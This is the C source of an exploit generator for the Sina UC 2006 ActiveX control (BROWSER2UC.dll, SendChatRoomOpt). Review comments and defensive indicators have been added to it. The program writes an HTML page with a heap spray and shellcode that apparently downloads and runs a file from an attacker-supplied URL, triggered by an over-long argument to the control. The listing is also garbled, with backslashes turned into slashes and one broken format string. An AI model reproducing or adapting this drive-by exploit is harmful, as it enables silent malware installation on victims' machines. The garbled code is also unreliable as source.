Sina UC 2006 Activex SendChatRoomOpt Exploit


    // Sina UC 2006 ActiveX SendChatRoomOpt Exploit
// Code by 云舒 & LuoLuo, ph4nt0morg
//
// NOTE(review): this program is a generator for a proof-of-concept HTML page
// aimed at the BROWSER2UC.dll ActiveX control
// (CLSID 77AE4780-75E0-4CB0-A162-D1BBE3D50384, ProgID "BROWSER2UC.BROWSERToUC").
// It writes a single file, "fuck_uc.html", made of: a fixed prologue (header),
// the bytes of sc[] plus the URL from argv[1] as "%uXXXX" escapes, a fixed
// spray script (footer) and a per-OS script that calls SendChatRoomOpt with an
// over-long first argument (seh).
// As published every backslash in the escape sequences ("/x..", "/n", "/"")
// has been replaced by a forward slash, so the listing does not compile as-is;
// it is kept verbatim for reference.
// Defensive notes: the CLSID and ProgID above, and the literal
// "var heapSprayToAddress = 0x0c0c0c0c;", are content-level indicators for the
// generated page. On a host the control can be disabled by setting the
// Internet Explorer kill bit for that CLSID; a fixed control from the vendor is
// the proper remediation.

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <string.h>

// Output stream for the generated page; opened in main(), written by both
// main() and PrintPayLoad().
FILE *fp = NULL;
// Name of the HTML file main() creates.
char *file = "fuck_uc.html";
// argv[1]; main() appends it after the sc[] bytes before encoding.
char *url = NULL;

// Raw payload bytes embedded in the generated page. main() copies
// sizeof(sc)-1 bytes (dropping only the implicit string terminator) and
// appends url after them. The bytes are left exactly as published; their
// behaviour is not documented here.
unsigned char sc[] =
    "/x60/x64/xa1/x30/x00/x00/x00/x8b/x40/x0c/x8b/x70/x1c/xad/x8b/x70"
    "/x08/x81/xec/x00/x04/x00/x00/x8b/xec/x56/x68/x8e/x4e/x0e/xec/xe8"
    "/xff/x00/x00/x00/x89/x45/x04/x56/x68/x98/xfe/x8a/x0e/xe8/xf1/x00"
    "/x00/x00/x89/x45/x08/x56/x68/x25/xb0/xff/xc2/xe8/xe3/x00/x00/x00"
    "/x89/x45/x0c/x56/x68/xef/xce/xe0/x60/xe8/xd5/x00/x00/x00/x89/x45"
    "/x10/x56/x68/xc1/x79/xe5/xb8/xe8/xc7/x00/x00/x00/x89/x45/x14/x40"
    "/x80/x38/xc3/x75/xfa/x89/x45/x18/xe9/x08/x01/x00/x00/x5e/x89/x75"
    "/x24/x8b/x45/x04/x6a/x01/x59/x8b/x55/x18/x56/xe8/x8c/x00/x00/x00"
    "/x50/x68/x36/x1a/x2f/x70/xe8/x98/x00/x00/x00/x89/x45/x1c/x8b/xc5"
    "/x83/xc0/x50/x89/x45/x20/x68/xff/x00/x00/x00/x50/x8b/x45/x14/x6a"
    "/x02/x59/x8b/x55/x18/xe8/x62/x00/x00/x00/x03/x45/x20/xc7/x00/x5c"
    "/x7e/x2e/x65/xc7/x40/x04/x78/x65/x00/x00/xff/x75/x20/x8b/x45/x0c"
    "/x6a/x01/x59/x8b/x55/x18/xe8/x41/x00/x00/x00/x6a/x07/x58/x03/x45"
    "/x24/x33/xdb/x53/x53/xff/x75/x20/x50/x53/x8b/x45/x1c/x6a/x05/x59"
    "/x8b/x55/x18/xe8/x24/x00/x00/x00/x6a/x00/xff/x75/x20/x8b/x45/x08"
    "/x6a/x02/x59/x8b/x55/x18/xe8/x11/x00/x00/x00/x81/xc4/x00/x04/x00"
    "/x00/x61/x81/xc4/xdc/x04/x00/x00/x5d/xc2/x24/x00/x41/x5b/x52/x03"
    "/xe1/x03/xe1/x03/xe1/x03/xe1/x83/xec/x04/x5a/x53/x8b/xda/xe2/xf7"
    "/x52/xff/xe0/x55/x8b/xec/x8b/x7d/x08/x8b/x5d/x0c/x56/x8b/x73/x3c"
    "/x8b/x74/x1e/x78/x03/xf3/x56/x8b/x76/x20/x03/xf3/x33/xc9/x49/x41"
    "/xad/x03/xc3/x56/x33/xf6/x0f/xbe/x10/x3a/xf2/x74/x08/xc1/xce/x0d"
    "/x03/xf2/x40/xeb/xf1/x3b/xfe/x5e/x75/xe5/x5a/x8b/xeb/x8b/x5a/x24"
    "/x03/xdd/x66/x8b/x0c/x4b/x8b/x5a/x1c/x03/xdd/x8b/x04/x8b/x03/xc5"
    "/x5e/x5d/xc2/x08/x00/xe8/xf3/xfe/xff/xff/x55/x52/x4c/x4d/x4f/x4e"
    "/x00";

// Fixed prologue of the generated page: an HTML comment naming the control,
// its DLL path and the SendChatRoomOpt signature, then the opening of the
// script. It ends inside a "var shellcode = unescape(...)" expression that
// PrintPayLoad() continues and closes.
char * header =
    "<!--/n"
    "clsid:77AE4780-75E0-4CB0-A162-D1BBE3D50384/n"
    "C:/Program Files/sina/UC/ActiveX/BROWSER2UC.dll/n/n"
    "Sub SendChatRoomOpt (/n"
    "    ByVal astrVerion  As String ,/n"
    "    ByVal astrUserID  As String ,/n"
    "    ByVal asDataType  As Integer ,/n"
    "    ByVal alTypeID  As Long/n"
    ")/n/n"
    "ph4nt0m.org, Code By 云舒 & LuoLuo/n"
    "!-->/n/n"
    "<html>/n"
    "<head>/n"
    "<script language=/"javascript/">/n"
    "var heapSprayToAddress = 0x0c0c0c0c;/n"
    "var shellcode = unescape(/"%u9090/"+/"%u9090/"+ /n";

// Fixed script written after the encoded payload: fills an array with copies
// of a slide plus the shellcode string (the spray). Left as published.
char * footer =
    "/n"
    "var heapBlockSize = 0x100000;/n"
    "var payLoadSize = shellcode.length * 2;/n"
    "var spraySlideSize = heapBlockSize - (payLoadSize+0x38);/n"
    "var spraySlide = unescape(/"%u9090%u9090/");/n/n"
    "spraySlide = getSpraySlide(spraySlide,spraySlideSize);/n"
    "heapBlocks = (heapSprayToAddress - 0x100000)/heapBlockSize;/n"
    "memory = new Array();/n/n"
    "for (i=0;i<heapBlocks;i++)/n{/n"
    "/t/tmemory = spraySlide + shellcode;/n}/n"
    "function getSpraySlide(spraySlide, spraySlideSize)/n{/n/t"
    "while (spraySlide.length*2<spraySlideSize)/n/t"
    "{/n/t/tspraySlide += spraySlide;/n/t}/n"
    "/tspraySlide = spraySlide.substring(0,spraySlideSize/2);/n/treturn spraySlide;/n}/n/n";

// Write lpBuff[0..buffsize) to fp as one quoted JavaScript string of "%uXXXX"
// escapes, two bytes per escape, each pair read through an unsigned short
// pointer (host byte order). Appends "\");\n" (garbled here as "/");/n") to
// close the unescape(...) call that header left open.
//   lpBuff   - bytes to encode; main() passes a zero-filled 4096-byte array
//   buffsize - number of bytes; if odd, the last read takes one byte past the
//              data (harmless only because main()'s buffer is zero-filled)
// NOTE(review): the outer "if((i)==0)" opens the quote before the first
// escape; its inner "if(i!=0)" branch can never be taken. Reinterpreting a
// char array as unsigned short also violates strict aliasing.
void PrintPayLoad(char *lpBuff, int buffsize)
{
    int i;
    for(i=0;i < buffsize;i+=2)
    {
        if((i)==0)
        {
            if(i!=0)
            {
                fprintf(fp, "%s", "/" +/n/"");
            }
            else
            {
                fprintf(fp, "%s", "/"");
            }
        }
        fprintf(fp, "%%u%0.4x",((unsigned short*)lpBuff)[i/2]);
    }
    // print the shellcode after the header, then close it with " ) "
    fprintf(fp, "%s", "/");/n");
}

// Entry point: main <url> <os>. Writes "fuck_uc.html" and returns -1 on a
// usage error, a rejected URL or a failed fopen(); otherwise falls off the
// end (0 under C99 rules).
int main( int argc, char *argv[] )
{
    if( argc != 3 )
    {
        printf( "/nUC ActiveX object exp,Code by 云舒 & LuoLuo,ph4nt0morg/n" );
        printf( "Usage: %s   <url>   <os>/n", argv[0] );
        printf( "      1     Windows XP SP2 Chinese version,IE 6/n" );
        printf( "      2     Windows 2003 standard SP1 Chinese Version, IE 6/n" );
        return -1;
    }

    // seh: the closing script, formatted once with the per-OS "A" count.
    // atoi() reports no errors, so a non-numeric <os> becomes 0 and any value
    // other than 1 or 2 leaves len at 0.
    char    seh[1024] = { 0 };
    int        os = atoi( argv[2] );
    int        len = 0;
    if( os == 1 )
    {
        len = 3133;
    }
    else if( os == 2 )
    {
        len = 3193;
    }
    // The template is a fixed string of a few hundred bytes plus one %d, so it
    // fits in 1024 even though sprintf() itself is unbounded. The
    // "unescape(/"% % % % /")" fragment appears to have lost its contents in
    // publication and is not a valid printf conversion — verify against the
    // original source if this listing is ever rebuilt.
    sprintf( seh , "var obj = new ActiveXObject(/"BROWSER2UC.BROWSERToUC/");/n/tvar arg1;/n/n<!-- Windows2003 standard SP1 + IE6 此处覆盖长度i为3193 -->/n<!-- Windows XP SP2 + IE6 此处覆盖长度i为3133 -->/n/nfor( var i = 0; i < %d; i ++ )/n{/targ1 += /"A/";/n}arg1=arg1 + unescape(/"% % % % /");/narg2=/"defaultV/";/narg3=1;/narg4=1;/nobj.SendChatRoomOpt(arg1 ,arg2 ,arg3 ,arg4);/n</script>/n</head>/n</html>", len );

    // URL check: strstr() finds the scheme anywhere in the string, not only as
    // a prefix; strings shorter than 10 characters are also rejected.
    url = argv[1];
    if( (!strstr(url, "http://") &&  !strstr(url, "ftp://")) || strlen(url) < 10)
    {
        printf("[-] Invalid url. Must start with 'http://','ftp://'/n");
        return -1;
    }
    printf("[+] download url:%s/n", url);
    // NOTE(review): fopen() reports failures through errno; GetLastError() may
    // not describe this failure.
    fp = fopen( file , "w" );
    if( fp == NULL )
    {
        printf( "Create file error: %d/n", GetLastError() );
        return -1;
    }
    fprintf( fp, "%s", header );
    fflush( fp );

    // Payload buffer: sc[] without its implicit terminator, then url, then one
    // extra byte of length which is a NUL because buffer is zero-filled.
    // NOTE(review): neither memcpy() checks that sc_len + strlen(url) fits in
    // 4096, so an over-long argv[1] overruns this stack array in the generator
    // itself.
    char    buffer[4096] = { 0 };
    int        sc_len = sizeof(sc)-1;
    memcpy(buffer, sc, sc_len);
    memcpy(buffer+sc_len, url, strlen(url));
    sc_len += strlen(url)+1;
    PrintPayLoad((char *)buffer, sc_len);
    fflush( fp );

    // Output order: header, encoded payload, footer (spray), seh (the call).
    // fclose()'s return value is not checked, so a failed final flush goes
    // unreported.
    fprintf( fp, "%s", footer );
    fprintf( fp, "%s", seh );
    fflush( fp );
    fclose( fp );
    printf( "Create done!please look %s/n", file );
}
